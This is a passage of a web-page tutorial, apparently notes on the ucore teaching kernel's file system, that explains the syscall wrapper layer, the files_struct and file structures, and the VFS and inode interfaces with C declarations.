       <span class="comment">// Open or create a file. FLAGS/MODE per the syscall.</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_close</span><span class="params">(<span class="type">int</span> fd)</span></span>;                                      <span class="comment">// Close a vnode opened  </span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_read</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len)</span></span>;               <span class="comment">// Read file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_write</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len)</span></span>;              <span class="comment">// Write file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_seek</span><span class="params">(<span class="type">int</span> fd, <span class="type">off_t</span> pos, <span class="type">int</span> whence)</span></span>;                <span class="comment">// Seek file  </span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_fstat</span><span class="params">(<span class="type">int</span> fd, <span class="keyword">struct</span> stat *stat)</span></span>;                   <span class="comment">// Stat file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_fsync</span><span class="params">(<span class="type">int</span> fd)</span></span>;                                      <span class="comment">// Sync file</span></span><br><span class="line"><span class="function"><span 
class="type">int</span> <span class="title">sysfile_chdir</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path)</span></span>;                            <span class="comment">// change DIR  </span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_mkdir</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path)</span></span>;                            <span class="comment">// create DIR</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_link</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path1, <span class="type">const</span> <span class="type">char</span> *path2)</span></span>;         <span class="comment">// set a path1&#x27;s link as path2</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_rename</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path1, <span class="type">const</span> <span class="type">char</span> *path2)</span></span>;       <span class="comment">// rename file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_unlink</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path)</span></span>;                           <span class="comment">// unlink a path</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_getcwd</span><span class="params">(<span class="type">char</span> *buf, <span class="type">size_t</span> len)</span></span>;                      <span class="comment">// get current working directory</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span 
class="title">sysfile_getdirentry</span><span class="params">(<span class="type">int</span> fd, <span class="keyword">struct</span> dirent *direntp)</span></span>;        <span class="comment">// get the file entry in DIR</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_dup</span><span class="params">(<span class="type">int</span> fd1, <span class="type">int</span> fd2)</span></span>;                              <span class="comment">// duplicate file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_pipe</span><span class="params">(<span class="type">int</span> *fd_store)</span></span>;                                <span class="comment">// build PIPE</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_mkfifo</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *name, <span class="type">uint32_t</span> open_flags)</span></span>;      <span class="comment">// build named PIPE</span></span><br></pre></td></tr></table></figure><p>Each of these <code>sysfile_xx</code> functions calls the corresponding wrapped <code>file_xx</code> function in the next layer down:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_open</span><span class="params">(<span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags)</span></span>;</span><br><span class="line"><span class="function"><span 
class="type">int</span> <span class="title">file_close</span><span class="params">(<span class="type">int</span> fd)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_read</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len, <span class="type">size_t</span> *copied_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_write</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len, <span class="type">size_t</span> *copied_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_seek</span><span class="params">(<span class="type">int</span> fd, <span class="type">off_t</span> pos, <span class="type">int</span> whence)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_fstat</span><span class="params">(<span class="type">int</span> fd, <span class="keyword">struct</span> stat *stat)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_fsync</span><span class="params">(<span class="type">int</span> fd)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_getdirentry</span><span class="params">(<span class="type">int</span> fd, <span class="keyword">struct</span> dirent *dirent)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_dup</span><span class="params">(<span class="type">int</span> fd1, <span class="type">int</span> fd2)</span></span>;</span><br><span class="line"><span class="function"><span 
class="type">int</span> <span class="title">file_pipe</span><span class="params">(<span class="type">int</span> fd[])</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_mkfifo</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *name, <span class="type">uint32_t</span> open_flags)</span></span>;</span><br></pre></td></tr></table></figure><p>In general, these functions operate on the current process's file access data structure, <code>current-&gt;filesp</code>. The <code>struct files_struct</code> is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * process&#x27;s file related information</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">files_struct</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *pwd;      <span class="comment">// inode of present working directory</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">file</span> *fd_array;  <span class="comment">// opened files array</span></span><br><span class="line">    <span class="type">int</span> files_count;        <span class="comment">// the number of opened files</span></span><br><span class="line">    <span class="type">semaphore_t</span> files_sem;  <span class="comment">// lock protect sem</span></span><br><span 
class="line">&#125;;</span><br></pre></td></tr></table></figure><p>This structure holds the current process's working directory, the array of files it has opened, a semaphore, and so on.</p><p>The index of an open file in a process's <code>fd_array</code> is that file's file descriptor within the process.</p><blockquote><p>In other words, different processes opening the same file may get different file descriptors.</p></blockquote><h5 id="2-文件系统抽象层-VFS">2) File System Abstraction Layer (VFS)</h5><h6 id="VFS接口与数据结构">VFS Interfaces and Data Structures</h6><blockquote><p>The file system abstraction layer extracts the external interface that the different file systems have in common into an array of function pointers. The generic file system access interface layer then only needs to talk to the abstraction layer and does not have to care about the implementation details or interfaces of any specific file system.</p></blockquote><p>One layer below the system call interface is the virtual file system, <code>VFS</code>. The VFS functions work with the file structure <code>struct file</code>, which records the properties of an open file: its read/write permissions, the file descriptor <code>fd</code>, the current position <code>pos</code>, the node <code>node</code> that corresponds to a specific region of the disk in the file system, and the open reference count <code>open_count</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">file</span> &#123;</span><br><span class="line">    <span class="keyword">enum</span> &#123;</span><br><span class="line">        FD_NONE, FD_INIT, FD_OPENED, FD_CLOSED,</span><br><span class="line">    &#125; status;</span><br><span class="line">    <span class="type">bool</span> readable;</span><br><span class="line">    <span class="type">bool</span> writable;</span><br><span class="line">    <span class="type">int</span> fd;</span><br><span class="line">    <span class="type">off_t</span> pos; <span class="comment">// current offset: where the next read or write starts</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">    <span class="type">int</span> open_count;</span><br><span 
class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The function interfaces used by the virtual file system are as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 
class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span 
class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Virtual File System layer functions.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The VFS layer translates operations on abstract on-disk files or</span></span><br><span class="line"><span class="comment"> * pathnames to operations on specific files on specific filesystems.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">vfs_init</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">vfs_cleanup</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">vfs_devlist_init</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * VFS layer low-level operations.</span></span><br><span class="line"><span class="comment"> * See inode.h for direct operations on inodes.</span></span><br><span class="line"><span class="comment"> * 
See fs.h for direct operations on filesystems/devices.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_set_curdir   - change current directory of current thread by inode</span></span><br><span class="line"><span class="comment"> *    vfs_get_curdir   - retrieve inode of current directory of current thread</span></span><br><span class="line"><span class="comment"> *    vfs_get_root     - get root inode for the filesystem named DEVNAME</span></span><br><span class="line"><span class="comment"> *    vfs_get_devname  - get mounted device name for the filesystem passed in</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_set_curdir</span><span class="params">(<span class="keyword">struct</span> inode *dir)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_get_curdir</span><span class="params">(<span class="keyword">struct</span> inode **dir_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_get_root</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="keyword">struct</span> inode **root_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">const</span> <span class="type">char</span> *<span class="title">vfs_get_devname</span><span class="params">(<span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * VFS layer high-level operations on pathnames</span></span><br><span class="line"><span class="comment"> * Because namei may destroy pathnames, these all may 
too.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_open         - Open or create a file. FLAGS/MODE per the syscall.</span></span><br><span class="line"><span class="comment"> *    vfs_close  - Close a inode opened with vfs_open. Does not fail.</span></span><br><span class="line"><span class="comment"> *                 (See vfspath.c for a discussion of why.)</span></span><br><span class="line"><span class="comment"> *    vfs_link         - Create a hard link to a file.</span></span><br><span class="line"><span class="comment"> *    vfs_symlink      - Create a symlink PATH containing contents CONTENTS.</span></span><br><span class="line"><span class="comment"> *    vfs_readlink     - Read contents of a symlink into a uio.</span></span><br><span class="line"><span class="comment"> *    vfs_mkdir        - Create a directory. MODE per the syscall.</span></span><br><span class="line"><span class="comment"> *    vfs_unlink       - Delete a file/directory.</span></span><br><span class="line"><span class="comment"> *    vfs_rename       - rename a file.</span></span><br><span class="line"><span class="comment"> *    vfs_chdir  - Change current directory of current thread by name.</span></span><br><span class="line"><span class="comment"> *    vfs_getcwd - Retrieve name of current directory of current thread.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_open</span><span class="params">(<span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags, <span class="keyword">struct</span> inode **inode_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_close</span><span class="params">(<span 
class="keyword">struct</span> inode *node)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_link</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_symlink</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_readlink</span><span class="params">(<span class="type">char</span> *path, <span class="keyword">struct</span> iobuf *iob)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_mkdir</span><span class="params">(<span class="type">char</span> *path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_unlink</span><span class="params">(<span class="type">char</span> *path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_rename</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_chdir</span><span class="params">(<span class="type">char</span> *path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_getcwd</span><span class="params">(<span class="keyword">struct</span> iobuf *iob)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * VFS layer mid-level 
operations.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_lookup     - Like VOP_LOOKUP, but takes a full device:path name,</span></span><br><span class="line"><span class="comment"> *                     or a name relative to the current directory, and</span></span><br><span class="line"><span class="comment"> *                     goes to the correct filesystem.</span></span><br><span class="line"><span class="comment"> *    vfs_lookparent - Likewise, for VOP_LOOKPARENT.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Both of these may destroy the path passed in.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_lookup</span><span class="params">(<span class="type">char</span> *path, <span class="keyword">struct</span> inode **node_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_lookup_parent</span><span class="params">(<span class="type">char</span> *path, <span class="keyword">struct</span> inode **node_store, <span class="type">char</span> **endp)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Misc</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_set_bootfs - Set the filesystem that paths beginning with a</span></span><br><span class="line"><span class="comment"> *                    slash are sent to. If not set, these paths fail</span></span><br><span class="line"><span class="comment"> *                    with ENOENT. 
The argument should be the device</span></span><br><span class="line"><span class="comment"> *                    name or volume name for the filesystem (such as</span></span><br><span class="line"><span class="comment"> *                    &quot;lhd0:&quot;) but need not have the trailing colon.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_get_bootfs - return the inode of the bootfs filesystem.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_add_fs     - Add a hardwired filesystem to the VFS named device</span></span><br><span class="line"><span class="comment"> *                    list. It will be accessible as &quot;devname:&quot;. This is</span></span><br><span class="line"><span class="comment"> *                    intended for filesystem-devices like emufs, and</span></span><br><span class="line"><span class="comment"> *                    gizmos like Linux procfs or BSD kernfs, not for</span></span><br><span class="line"><span class="comment"> *                    mounting filesystems on disk devices.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_add_dev    - Add a device to the VFS named device list. If</span></span><br><span class="line"><span class="comment"> *                    MOUNTABLE is zero, the device will be accessible</span></span><br><span class="line"><span class="comment"> *                    as &quot;DEVNAME:&quot;. If the mountable flag is set, the</span></span><br><span class="line"><span class="comment"> *                    device will be accessible as &quot;DEVNAMEraw:&quot; and</span></span><br><span class="line"><span class="comment"> *                    mountable under the name &quot;DEVNAME&quot;. 
Thus, the</span></span><br><span class="line"><span class="comment"> *                    console, added with MOUNTABLE not set, would be</span></span><br><span class="line"><span class="comment"> *                    accessed by pathname as &quot;con:&quot;, and lhd0, added</span></span><br><span class="line"><span class="comment"> *                    with mountable set, would be accessed by</span></span><br><span class="line"><span class="comment"> *                    pathname as &quot;lhd0raw:&quot; and mounted by passing</span></span><br><span class="line"><span class="comment"> *                    &quot;lhd0&quot; to vfs_mount.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_mount      - Attempt to mount a filesystem on a device. The</span></span><br><span class="line"><span class="comment"> *                    device named by DEVNAME will be looked up and</span></span><br><span class="line"><span class="comment"> *                    passed, along with DATA, to the supplied function</span></span><br><span class="line"><span class="comment"> *                    MOUNTFUNC, which should create a struct fs and</span></span><br><span class="line"><span class="comment"> *                    return it in RESULT.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_unmount    - Unmount the filesystem presently mounted on the</span></span><br><span class="line"><span class="comment"> *                    specified device.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_unmountall - Unmount all mounted filesystems.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_set_bootfs</span><span class="params">(<span 
class="type">char</span> *fsname)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_get_bootfs</span><span class="params">(<span class="keyword">struct</span> inode **node_store)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_add_fs</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_add_dev</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="keyword">struct</span> inode *devnode, <span class="type">bool</span> mountable)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_mount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="type">int</span> (*mountfunc)(<span class="keyword">struct</span> device *dev, <span class="keyword">struct</span> fs **fs_store))</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_unmount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_unmount_all</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Lower-level operations in the VFS</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">inode_ops</span> &#123;</span><br><span class="line">    <span 
class="type">unsigned</span> <span class="type">long</span> vop_magic;</span><br><span class="line">    <span class="built_in">int</span> (*vop_open)(<span class="keyword">struct</span> inode *node, <span class="type">uint32_t</span> open_flags);</span><br><span class="line">    <span class="built_in">int</span> (*vop_close)(<span class="keyword">struct</span> inode *node);</span><br><span class="line">    <span class="built_in">int</span> (*vop_read)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob);</span><br><span class="line">    <span class="built_in">int</span> (*vop_write)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob);</span><br><span class="line">    <span class="built_in">int</span> (*vop_fstat)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> stat *stat);</span><br><span class="line">    <span class="built_in">int</span> (*vop_fsync)(<span class="keyword">struct</span> inode *node);</span><br><span class="line">    <span class="built_in">int</span> (*vop_namefile)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob);</span><br><span class="line">    <span class="built_in">int</span> (*vop_getdirentry)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob);</span><br><span class="line">    <span class="built_in">int</span> (*vop_reclaim)(<span class="keyword">struct</span> inode *node);</span><br><span class="line">    <span class="built_in">int</span> (*vop_gettype)(<span class="keyword">struct</span> inode *node, <span class="type">uint32_t</span> *type_store);</span><br><span class="line">    <span class="built_in">int</span> (*vop_tryseek)(<span class="keyword">struct</span> inode *node, <span class="type">off_t</span> pos);</span><br><span class="line">    <span class="built_in">int</span> (*vop_truncate)(<span 
class="keyword">struct</span> inode *node, <span class="type">off_t</span> len);</span><br><span class="line">    <span class="built_in">int</span> (*vop_create)(<span class="keyword">struct</span> inode *node, <span class="type">const</span> <span class="type">char</span> *name, <span class="type">bool</span> excl, <span class="keyword">struct</span> inode **node_store);</span><br><span class="line">    <span class="built_in">int</span> (*vop_lookup)(<span class="keyword">struct</span> inode *node, <span class="type">char</span> *path, <span class="keyword">struct</span> inode **node_store);</span><br><span class="line">    <span class="built_in">int</span> (*vop_ioctl)(<span class="keyword">struct</span> inode *node, <span class="type">int</span> op, <span class="type">void</span> *data);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h6 id="inode接口">The inode interface</h6><p><code>vfs</code> operates on the <code>inode</code> structure, an in-memory index node. It is a key data structure in the VFS because it wraps the filesystem-specific index node information of different filesystems (some of which is not strictly an index node at all) behind a single type, so that processes never access a concrete filesystem directly. It is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span 
class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * A struct inode is an abstract representation of a file.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * It is an interface that allows the kernel&#x27;s filesystem-independent</span></span><br><span class="line"><span class="comment"> * code to interact usefully with multiple sets of filesystem code.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Abstract low-level file.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Note: in_info is Filesystem-specific data, in_type is the inode type</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * open_count is managed using VOP_INCOPEN and VOP_DECOPEN by</span></span><br><span class="line"><span class="comment"> * vfs_open() and vfs_close(). 
Code above the VFS layer should not</span></span><br><span class="line"><span class="comment"> * need to worry about it.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">inode</span> &#123;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="comment">// device node</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">device</span> __device_info;</span><br><span class="line">        <span class="comment">// the actual file/directory node in the underlying filesystem</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">sfs_inode</span> __sfs_inode_info;</span><br><span class="line">    &#125; in_info;</span><br><span class="line">    <span class="keyword">enum</span> &#123;</span><br><span class="line">        inode_type_device_info = <span class="number">0x1234</span>,</span><br><span class="line">        inode_type_sfs_inode_info,</span><br><span class="line">    &#125; in_type;</span><br><span class="line">    <span class="type">int</span> ref_count;</span><br><span class="line">    <span class="type">int</span> open_count;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">fs</span> *in_fs;</span><br><span class="line">    <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> *in_ops;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p><code>struct inode</code> holds the filesystem-specific data <code>in_info</code>, the node type <code>in_type</code>, the reference count <code>ref_count</code>, the open count <code>open_count</code>, the associated filesystem <code>in_fs</code>, and the operation table <code>in_ops</code> for this node. The structure is tied to the corresponding region on disk, which makes disk operations convenient.</p><p>The <code>inode_ops</code> member is an abstract function table covering every operation on regular files, directories, and device files. A concrete filesystem only has to implement the relevant functions for its files and directories to become accessible to user processes, which need not know anything about the filesystem's implementation details. The available implementations are as follows:</p><figure 
class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Function table for device inodes.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="comment">// The sfs specific DIR operations correspond to the abstract operations on a inode.</span></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> sfs_node_dirops = &#123;</span><br><span 
